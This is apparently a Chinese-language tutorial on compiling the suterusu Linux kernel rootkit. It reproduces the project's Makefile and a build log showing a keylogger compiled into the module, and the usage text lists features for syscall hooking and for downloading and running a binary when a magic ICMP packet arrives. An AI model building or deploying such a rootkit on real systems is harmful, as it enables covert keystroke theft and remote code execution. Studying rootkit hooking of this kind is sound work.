suterusu lkm 代码下载路径:
https://github.com/mncoppola/suterusu
虽然这个 LKM 是好几年前开发的，但其中的 hook 原理仍然值得好好研究。我这里使用的系统是 Ubuntu 14.04.1 LTS，内核版本 4.2.0-42-generic。
编译 --> make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build
我们先来看看Makefile
# Kernel object handed to kbuild. The artifact takes its name from this entry
# (suterusu.ko) and is linked from the per-feature object list below.
obj-m += suterusu.o

# Core objects, always part of the module.
suterusu-objs := main.o util.o module.o

# Optional features. Each one is selected by giving the variable any non-empty
# value on the make command line (e.g. KEYLOGGER=y). Selecting a feature appends
# its object file and a -D_CONFIG_* macro to MODULES; MODULES is spliced into
# EXTRA_CFLAGS by the build targets, so the macros reach the C compiler
# (presumably the sources test them with #ifdef — not visible here).
ifdef KEYLOGGER
    suterusu-objs += keylogger.o
    MODULES       += -D_CONFIG_KEYLOGGER_
    # UNLOCK and LOGFILE are nested: they are only honoured together with KEYLOGGER.
    ifdef UNLOCK
        MODULES += -D_CONFIG_UNLOCK_
    endif
    ifdef LOGFILE
        MODULES += -D_CONFIG_LOGFILE_
    endif
endif

ifdef HOOKRW
    suterusu-objs += hookrw.o
    MODULES       += -D_CONFIG_HOOKRW_
endif

ifdef DLEXEC
    suterusu-objs += dlexec.o
    MODULES       += -D_CONFIG_DLEXEC_
    # ICMP is nested: it is only honoured together with DLEXEC.
    ifdef ICMP
        suterusu-objs += icmp.o
        MODULES       += -D_CONFIG_ICMP_
    endif
endif
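# Usage text, printed when make is run with no goal.
# Declared phony and pinned as the default goal: without .PHONY a stray file
# named "default" in the source tree would make this target look up to date,
# and the usage text would silently stop appearing.
# A single printf replaces one shell per echo line; the output is unchanged
# ('' prints the blank separator lines).
.PHONY: default
.DEFAULT_GOAL := default
default:
	@printf '%s\n' \
	  'To build Suterusu:' \
	  ' make TARGET KDIR=/path/to/kernel' \
	  '' \
	  'To build with additional modules:' \
	  ' make TARGET KDIR=/path/to/kernel MODULE1=y MODULE2=y...' \
	  '' \
	  'To cross-compile:' \
	  ' make TARGET CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel' \
	  '' \
	  'To clean the build dir:' \
	  ' make clean KDIR=/path/to/kernel' \
	  '' \
	  'Supported targets:' \
	  'linux-x86 Linux, x86' \
	  'linux-x86_64 Linux, x86_64' \
	  'android-arm Android Linux, ARM' \
	  '' \
	  'Supported modules:' \
	  'KEYLOGGER Monitor keystrokes' \
	  ' UNLOCK Unlock the screen upon given key sequence' \
	  ' LOGFILE Log keystrokes to a local file' \
	  'HOOKRW Hook sys_read and sys_write' \
	  'DLEXEC Download & execute a binary upon event' \
	  ' ICMP Monitor inbound ICMP for magic packet'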
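# Build the module for 32-bit x86 by delegating to the kernel's kbuild
# (make -C KDIR M=<this dir> modules). KDIR must name a configured kernel
# build tree. The ifndef is evaluated at parse time, so when KDIR is unset the
# recipe consists of the error message followed by a failing exit.
# Phony: the target is a command, not a file named linux-x86.
# $(CURDIR) replaces $(PWD): PWD is merely inherited from the environment and
# can be unset or stale (non-interactive invocations), whereas make sets
# CURDIR itself. EXTRA_CFLAGS is the legacy kbuild name for extra compiler
# flags (kbuild folds it into ccflags-y); MODULES carries the -D_CONFIG_* feature macros.
.PHONY: linux-x86
linux-x86:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=x86 EXTRA_CFLAGS="-D_CONFIG_X86_ ${MODULES}" -C "$(KDIR)" M="$(CURDIR)" modules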
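# Build the module for x86_64 by delegating to the kernel's kbuild
# (make -C KDIR M=<this dir> modules). KDIR must name a configured kernel
# build tree; the parse-time ifndef turns the recipe into an error message
# plus a failing exit when it is missing.
# Phony: the target is a command, not a file named linux-x86_64.
# $(CURDIR) replaces $(PWD): PWD is only inherited from the environment and can
# be unset or stale, whereas make sets CURDIR itself.
# MODULES carries the -D_CONFIG_* feature macros selected at the top of the file.
.PHONY: linux-x86_64
linux-x86_64:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ ${MODULES}" -C "$(KDIR)" M="$(CURDIR)" modules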
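# Build the module for ARM (Android kernels) by delegating to kbuild.
# CROSS_COMPILE is not set here; the usage text expects it on the command line
# and kbuild picks it up from the environment/command line.
# -fno-pic is passed in addition to the feature macros; why it is needed is not
# stated on the page — presumably a toolchain requirement for this target.
# Phony: the target is a command, not a file named android-arm.
# $(CURDIR) replaces $(PWD): PWD is only inherited from the environment and can
# be unset or stale, whereas make sets CURDIR itself.
.PHONY: android-arm
android-arm:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=arm EXTRA_CFLAGS="-D_CONFIG_ARM_ -fno-pic ${MODULES}" -C "$(KDIR)" M="$(CURDIR)" modules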
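# Remove build products by running kbuild's own clean for this module dir.
# KDIR is required for the same reason as for the build targets: kbuild lives
# in the kernel tree. Phony so that a file named "clean" cannot shadow the
# target. $(CURDIR) replaces $(PWD) (make-provided rather than environment-inherited).
.PHONY: clean
clean:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) -C "$(KDIR)" M="$(CURDIR)" clean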
那如果我们要添加support modules我们应该怎么去编译呢?
从 Makefile 中可以看到，它通过 make 的 ifdef 条件来决定是否编译 support modules。
比如我要在ko 中添加键盘记录功能,make 命令
make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1
如果还需要编译其他功能，只需依次添加对应的变量即可。
curtis@curtis-virtual-machine:~/Desktop/suterusu-master$ make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_KEYLOGGER_" -C /lib/modules/4.2.0-42-generic/build M=/home/curtis/Desktop/suterusu-master modules
make[1]: Entering directory `/usr/src/linux-headers-4.2.0-42-generic'
CC [M] /home/curtis/Desktop/suterusu-master/main.o
CC [M] /home/curtis/Desktop/suterusu-master/util.o
CC [M] /home/curtis/Desktop/suterusu-master/module.o
CC [M] /home/curtis/Desktop/suterusu-master/keylogger.o
LD [M] /home/curtis/Desktop/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/curtis/Desktop/suterusu-master/suterusu.mod.o
LD [M] /home/curtis/Desktop/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/linux-headers-4.2.0-42-generic'
成功将键盘记录功能编译进ko文件